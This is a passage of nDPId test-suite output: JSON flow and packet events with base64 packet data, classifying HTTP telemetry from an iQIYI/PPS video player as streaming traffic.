wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} +01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 